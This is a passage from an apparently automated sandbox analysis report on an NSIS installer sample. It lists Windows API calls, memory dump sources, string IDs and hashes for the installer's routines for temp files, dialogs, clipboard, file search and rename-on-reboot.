                                                  • SetEnvironmentVariableW.KERNEL32(TMP,00436800), ref: 0040358D
                                                  • DeleteFileW.KERNEL32(00436000), ref: 004035A1
                                                  • OleUninitialize.OLE32(?), ref: 0040366C
                                                  • ExitProcess.KERNEL32 ref: 0040368C
                                                  • lstrcatW.KERNEL32(00436800,~nsu.tmp,00434000,00000000,?), ref: 00403698
                                                  • lstrcmpiW.KERNEL32(00436800,00435800,00436800,~nsu.tmp,00434000,00000000,?), ref: 004036A4
                                                  • CreateDirectoryW.KERNEL32(00436800,00000000), ref: 004036B0
                                                  • SetCurrentDirectoryW.KERNEL32(00436800), ref: 004036B7
                                                  • DeleteFileW.KERNEL32(0041FEA8,0041FEA8,?,0042A000,?), ref: 00403711
                                                  • CopyFileW.KERNEL32(00437800,0041FEA8,?), ref: 00403725
                                                  • CloseHandle.KERNEL32(00000000,0041FEA8,0041FEA8,?,0041FEA8,00000000), ref: 00403752
                                                  • GetCurrentProcess.KERNEL32(00000028,00000006,00000006,00000005,00000004), ref: 004037AC
                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 00403804
                                                  • ExitProcess.KERNEL32 ref: 00403827
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                  • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                  • API String ID: 4107622049-1875889550
                                                  • Opcode ID: d952f9c30b305397e7321c136bd4514fabccd71d09d56b1e0123fd5a1a2d1ce8
                                                  • Instruction ID: 39938aed3c042d93969ea090ff24049052e59ae08dabad03a7e97e37c14ef613
                                                  • Opcode Fuzzy Hash: d952f9c30b305397e7321c136bd4514fabccd71d09d56b1e0123fd5a1a2d1ce8
                                                  • Instruction Fuzzy Hash: 8AC12670604311AAD720BF659C49A2B3EACEB8574AF10483FF480B62D2D77D9D41CB6E
                                                  APIs
                                                  • DeleteFileW.KERNEL32(?,?,00436800,771B2EE0,00434000), ref: 004057F9
                                                  • lstrcatW.KERNEL32(004246F0,\*.*,004246F0,?,?,00436800,771B2EE0,00434000), ref: 00405841
                                                  • lstrcatW.KERNEL32(?,00409014,?,004246F0,?,?,00436800,771B2EE0,00434000), ref: 00405864
                                                  • lstrlenW.KERNEL32(?,?,00409014,?,004246F0,?,?,00436800,771B2EE0,00434000), ref: 0040586A
                                                  • FindFirstFileW.KERNEL32(004246F0,?,?,?,00409014,?,004246F0,?,?,00436800,771B2EE0,00434000), ref: 0040587A
                                                  • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 0040591A
                                                  • FindClose.KERNEL32(00000000), ref: 00405929
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                  • String ID: \*.*
                                                  • API String ID: 2035342205-1173974218
                                                  • Opcode ID: 3bfd9f40d867dfb13d75fcd1b7ef3c21c8eb5f8be3eae84d4eb3b7d6c7e95577
                                                  • Instruction ID: 2292a97837c012d07e09995a86319137dd3f2048718c0aa8a22e23afcdeedbd0
                                                  • Opcode Fuzzy Hash: 3bfd9f40d867dfb13d75fcd1b7ef3c21c8eb5f8be3eae84d4eb3b7d6c7e95577
                                                  • Instruction Fuzzy Hash: BF41C171800914EACF217B668C49BBF7678EB81328F24817BF811761D1D77C4E829E6E
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a31c6952aff2c2d9e3077db5cda77fcb20a4fa1314c68fe29834e6b9dbef6b62
                                                  • Instruction ID: 2d3234ddcc30eb1b928d1b3f6e05ca322d860fc2e9c12c5c13e3e91ce8371178
                                                  • Opcode Fuzzy Hash: a31c6952aff2c2d9e3077db5cda77fcb20a4fa1314c68fe29834e6b9dbef6b62
                                                  • Instruction Fuzzy Hash: 74F17571D04229CBCF28CFA8C8946ADBBB1FF44305F25856ED456BB281D3785A96CF44
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(00436800,00425738,00424EF0,00405AE4,00424EF0,00424EF0,00000000,00424EF0,00424EF0,00436800,?,771B2EE0,004057F0,?,00436800,771B2EE0), ref: 00406296
                                                  • FindClose.KERNEL32(00000000), ref: 004062A2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: Find$CloseFileFirst
                                                  • String ID: 8WB
                                                  • API String ID: 2295610775-3088156181
                                                  • Opcode ID: ea398e9f6ccb252cf4d9fa8037675df58843bd33ee06a9524947f1dc2dc69440
                                                  • Instruction ID: bfad84801e56aa45620b307e7a8f789e26230cc956ed9d1a225fdef78671a1f1
                                                  • Opcode Fuzzy Hash: ea398e9f6ccb252cf4d9fa8037675df58843bd33ee06a9524947f1dc2dc69440
                                                  • Instruction Fuzzy Hash: A7D01231A59020ABC6003B38AD0C84B7A989B553317224AB6F426F63E0C37C8C66969D
                                                  APIs
                                                  • GetDlgItem.USER32(?,00000403), ref: 00405390
                                                  • GetDlgItem.USER32(?,000003EE), ref: 0040539F
                                                  • GetClientRect.USER32(?,?), ref: 004053DC
                                                  • GetSystemMetrics.USER32(00000015), ref: 004053E4
                                                  • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 00405405
                                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405416
                                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405429
                                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405437
                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040544A
                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040546C
                                                  • ShowWindow.USER32(?,00000008), ref: 00405480
                                                  • GetDlgItem.USER32(?,000003EC), ref: 004054A1
                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004054B1
                                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004054CA
                                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004054D6
                                                  • GetDlgItem.USER32(?,000003F8), ref: 004053AE
                                                    • Part of subcall function 004041CF: SendMessageW.USER32(00000028,?,?,00403FFB), ref: 004041DD
                                                  • GetDlgItem.USER32(?,000003EC), ref: 004054F3
                                                  • CreateThread.KERNEL32(00000000,00000000,Function_000052C5,00000000), ref: 00405501
                                                  • CloseHandle.KERNEL32(00000000), ref: 00405508
                                                  • ShowWindow.USER32(00000000), ref: 0040552C
                                                  • ShowWindow.USER32(?,00000008), ref: 00405531
                                                  • ShowWindow.USER32(00000008), ref: 0040557B
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055AF
                                                  • CreatePopupMenu.USER32 ref: 004055C0
                                                  • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004055D4
                                                  • GetWindowRect.USER32(?,?), ref: 004055F4
                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040560D
                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405645
                                                  • OpenClipboard.USER32(00000000), ref: 00405655
                                                  • EmptyClipboard.USER32 ref: 0040565B
                                                  • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405667
                                                  • GlobalLock.KERNEL32(00000000), ref: 00405671
                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405685
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004056A5
                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 004056B0
                                                  • CloseClipboard.USER32 ref: 004056B6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                  • String ID: {$&B
                                                  • API String ID: 590372296-2518801558
                                                  • Opcode ID: 7570b3111e19f9b1f2c2f087663f0f5ff2e06d661aa676c5aff00108803347b1
                                                  • Instruction ID: 6f8bb207ab4459f732b66fbe2fdab1c380fd8c459621fe3193bce92f33b6cf64
                                                  • Opcode Fuzzy Hash: 7570b3111e19f9b1f2c2f087663f0f5ff2e06d661aa676c5aff00108803347b1
                                                  • Instruction Fuzzy Hash: ECB14A70900208FFDB119F60DD89AAE7B79FB04354F40817AFA05BA1A0C7759E52DF69
                                                  APIs
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CFE
                                                  • ShowWindow.USER32(?), ref: 00403D1B
                                                  • DestroyWindow.USER32 ref: 00403D2F
                                                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403D4B
                                                  • GetDlgItem.USER32(?,?), ref: 00403D6C
                                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D80
                                                  • IsWindowEnabled.USER32(00000000), ref: 00403D87
                                                  • GetDlgItem.USER32(?,?), ref: 00403E35
                                                  • GetDlgItem.USER32(?,00000002), ref: 00403E3F
                                                  • SetClassLongW.USER32(?,000000F2,?), ref: 00403E59
                                                  • SendMessageW.USER32(0000040F,00000000,?,?), ref: 00403EAA
                                                  • GetDlgItem.USER32(?,00000003), ref: 00403F50
                                                  • ShowWindow.USER32(00000000,?), ref: 00403F71
                                                  • EnableWindow.USER32(?,?), ref: 00403F83
                                                  • EnableWindow.USER32(?,?), ref: 00403F9E
                                                  • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00403FB4
                                                  • EnableMenuItem.USER32(00000000), ref: 00403FBB
                                                  • SendMessageW.USER32(?,000000F4,00000000,?), ref: 00403FD3
                                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403FE6
                                                  • lstrlenW.KERNEL32(004226E8,?,004226E8,00428200), ref: 0040400F
                                                  • SetWindowTextW.USER32(?,004226E8), ref: 00404023
                                                  • ShowWindow.USER32(?,0000000A), ref: 00404157
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                  • String ID: &B
                                                  • API String ID: 184305955-3208460036
                                                  • Opcode ID: 7cbc7830e6f4af9eeab0957ba226e6b71e67b9927e797dbb4650133cf52de542
                                                  • Instruction ID: 615a13079a357bc63dc92eaebf5b97e46402dd0953b19927b77141fc7a078d9b
                                                  • Opcode Fuzzy Hash: 7cbc7830e6f4af9eeab0957ba226e6b71e67b9927e797dbb4650133cf52de542
                                                  • Instruction Fuzzy Hash: B6C1A371A04201BBDB216F61ED49E2B3AA8FB95705F40093EF601B51F1C7799892DB2E
                                                  APIs
                                                    • Part of subcall function 004062B2: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 004062C4
                                                    • Part of subcall function 004062B2: LoadLibraryA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 004062CF
                                                    • Part of subcall function 004062B2: GetProcAddress.KERNEL32(00000000,?), ref: 004062E0
                                                  • lstrcatW.KERNEL32(00436000,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,00436800,771B3420,00000000,00434000), ref: 004039A0
                                                  • lstrlenW.KERNEL32(004271A0,?,?,?,004271A0,00000000,00434800,00436000,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,00436800), ref: 00403A20
                                                  • lstrcmpiW.KERNEL32(00427198,.exe,004271A0,?,?,?,004271A0,00000000,00434800,00436000,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000), ref: 00403A33
                                                  • GetFileAttributesW.KERNEL32(004271A0), ref: 00403A3E
                                                  • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,00434800), ref: 00403A87
                                                    • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                  • RegisterClassW.USER32(004281A0), ref: 00403AC4
                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403ADC
                                                  • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B11
                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403B47
                                                  • LoadLibraryW.KERNEL32(RichEd20), ref: 00403B58
                                                  • LoadLibraryW.KERNEL32(RichEd32), ref: 00403B63
                                                  • GetClassInfoW.USER32(00000000,RichEdit20W,004281A0), ref: 00403B73
                                                  • GetClassInfoW.USER32(00000000,RichEdit,004281A0), ref: 00403B80
                                                  • RegisterClassW.USER32(004281A0), ref: 00403B89
                                                  • DialogBoxParamW.USER32(?,00000000,00403CC2,00000000), ref: 00403BA8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$&B
                                                  • API String ID: 914957316-1918744475
                                                  • Opcode ID: da30a9c0db2d4db67001de93ddcc73e1ef45d51233dd8672779a7638217d6adb
                                                  • Instruction ID: 309fb0296e4a6d1bba18aa3b2e86eaa258190dfd088e540a173f113b23667d40
                                                  • Opcode Fuzzy Hash: da30a9c0db2d4db67001de93ddcc73e1ef45d51233dd8672779a7638217d6adb
                                                  • Instruction Fuzzy Hash: BE61B570644200BED720AF669C46F2B3A7CEB84749F40457FF945B62E2DB796902CA3D
                                                  APIs
                                                  • CheckDlgButton.USER32(?,-0000040A,?), ref: 004043D5
                                                  • GetDlgItem.USER32(?,000003E8), ref: 004043E9
                                                  • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 00404406
                                                  • GetSysColor.USER32(?), ref: 00404417
                                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404425
                                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404433
                                                  • lstrlenW.KERNEL32(?), ref: 00404438
                                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404445
                                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040445A
                                                  • GetDlgItem.USER32(?,0000040A), ref: 004044B3
                                                  • SendMessageW.USER32(00000000), ref: 004044BA
                                                  • GetDlgItem.USER32(?,000003E8), ref: 004044E5
                                                  • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404528
                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 00404536
                                                  • SetCursor.USER32(00000000), ref: 00404539
                                                  • ShellExecuteW.SHELL32(0000070B,open,004271A0,00000000,00000000,?), ref: 0040454E
                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 0040455A
                                                  • SetCursor.USER32(00000000), ref: 0040455D
                                                  • SendMessageW.USER32(00000111,?,00000000), ref: 0040458C
                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040459E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                  • String ID: N$open
                                                  • API String ID: 3615053054-904208323
                                                  • Opcode ID: 3a3e15a46bcef9b8006e363d6ddaa5c0bc478510f2ba28bfd0355cb20498c547
                                                  • Instruction ID: 8b9c65ccee0929ae2cd37a550bbe3266d1c56d3aba5277cbe5cc7d17fb3eae84
                                                  • Opcode Fuzzy Hash: 3a3e15a46bcef9b8006e363d6ddaa5c0bc478510f2ba28bfd0355cb20498c547
                                                  • Instruction Fuzzy Hash: 19718FB1A00209FFDB109F60DD85A6A7BA9FB94354F00853AFB01B62D1C778AD51CF99
                                                  APIs
                                                  • lstrcpyW.KERNEL32(00425D88,NUL,?,00000000,?,?,?,00405E0A,?,?,?,00405982,?,00000000,000000F1,?), ref: 00405C76
                                                  • CloseHandle.KERNEL32(00000000,00000000,00000000,?,?,?,?,00405E0A,?,?,?,00405982,?,00000000,000000F1,?), ref: 00405C9A
                                                  • GetShortPathNameW.KERNEL32(00000000,00425D88,00000400), ref: 00405CA3
                                                    • Part of subcall function 00405B19: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B29
                                                    • Part of subcall function 00405B19: lstrlenA.KERNEL32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B5B
                                                  • GetShortPathNameW.KERNEL32(?,00426588,00000400), ref: 00405CC0
                                                  • wsprintfA.USER32 ref: 00405CDE
                                                  • GetFileSize.KERNEL32(00000000,00000000,00426588,C0000000,00000004,00426588,?,?,?,?,?), ref: 00405D19
                                                  • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405D28
                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D60
                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425988,00000000,-0000000A,00409560,00000000,[Rename],00000000,00000000,00000000), ref: 00405DB6
                                                  • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405DC8
                                                  • GlobalFree.KERNEL32(00000000), ref: 00405DCF
                                                  • CloseHandle.KERNEL32(00000000), ref: 00405DD6
                                                    • Part of subcall function 00405BB4: GetFileAttributesW.KERNEL32(00000003,00402DFF,00437800,80000000,00000003), ref: 00405BB8
                                                    • Part of subcall function 00405BB4: CreateFileW.KERNEL32(?,?,?,00000000,?,00000001,00000000), ref: 00405BDA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                  • String ID: %ls=%ls$NUL$[Rename]
                                                  • API String ID: 1265525490-899692902
                                                  • Opcode ID: 7d53d5cdfc02749ad00d931577bac562460a5dc9187a855172881db6ba44cc92
                                                  • Instruction ID: 10a6a65bcc8db41326b0965a868e5b78be2cc6b43571d182478210b5aa6aebd6
                                                  • Opcode Fuzzy Hash: 7d53d5cdfc02749ad00d931577bac562460a5dc9187a855172881db6ba44cc92
                                                  • Instruction Fuzzy Hash: E941FE71604A18BFD2206B61AC4CF6B3A6CEF45714F24443BB901B62D2EA78AD018A7D
                                                  APIs
                                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                  • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                  • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                  • DrawTextW.USER32(00000000,00428200,000000FF,00000010,00000820), ref: 00401156
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                  • String ID: F
                                                  • API String ID: 941294808-1304234792
                                                  • Opcode ID: c8f07ac8fddda19ee2bf7cb4f90658f54556206f608d49a47768e3a2d0e378b6
                                                  • Instruction ID: fcf32cd20748a1213536d9d4e972d5f65e682a1af5e7fde79162f5b09e182029
                                                  • Opcode Fuzzy Hash: c8f07ac8fddda19ee2bf7cb4f90658f54556206f608d49a47768e3a2d0e378b6
                                                  • Instruction Fuzzy Hash: D2418B71804249AFCB058FA5DD459BFBBB9FF44310F00852AF561AA1A0C738EA51DFA5
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003FB), ref: 00404684
                                                  • SetWindowTextW.USER32(00000000,?), ref: 004046AE
                                                  • SHBrowseForFolderW.SHELL32(?), ref: 0040475F
                                                  • CoTaskMemFree.OLE32(00000000), ref: 0040476A
                                                  • lstrcmpiW.KERNEL32(004271A0,004226E8,00000000,?,?), ref: 0040479C
                                                  • lstrcatW.KERNEL32(?,004271A0), ref: 004047A8
                                                  • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004047BA
                                                    • Part of subcall function 00405708: GetDlgItemTextW.USER32(?,?,00000400,004047F1), ref: 0040571B
                                                    • Part of subcall function 004061DC: CharNextW.USER32(?,*?|<>/":,00000000,00434000,00436800,00436800,00000000,00403332,00436800,771B3420,00403542), ref: 0040623F
                                                    • Part of subcall function 004061DC: CharNextW.USER32(?,?,?,00000000), ref: 0040624E
                                                    • Part of subcall function 004061DC: CharNextW.USER32(?,00434000,00436800,00436800,00000000,00403332,00436800,771B3420,00403542), ref: 00406253
                                                    • Part of subcall function 004061DC: CharPrevW.USER32(?,?,00436800,00436800,00000000,00403332,00436800,771B3420,00403542), ref: 00406266
                                                  • GetDiskFreeSpaceW.KERNEL32(004206B8,?,?,0000040F,?,004206B8,004206B8,?,00000000,004206B8,?,?,000003FB,?), ref: 0040487B
                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404896
                                                  • SetDlgItemTextW.USER32(00000000,00000400,004206A8), ref: 0040490F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3137287103.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000008.00000002.3137240731.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137345951.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137429680.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000008.00000002.3137584632.000000000044A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_400000_ME-SPC-94.jbxd
                                                  Similarity
                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                  • String ID: A$&B
                                                  • API String ID: 2246997448-2586977930
                                                  • Opcode ID: 721fa909628c388d9eed4d059dc136074f5db6b4ff511665bfd1b1201094e888
                                                  • Instruction ID: 6e37369fe6ef7f71d764005b1086c215e28ed7130f32df1ae996be3c53d44702
                                                  • Opcode Fuzzy Hash: 721fa909628c388d9eed4d059dc136074f5db6b4ff511665bfd1b1201094e888
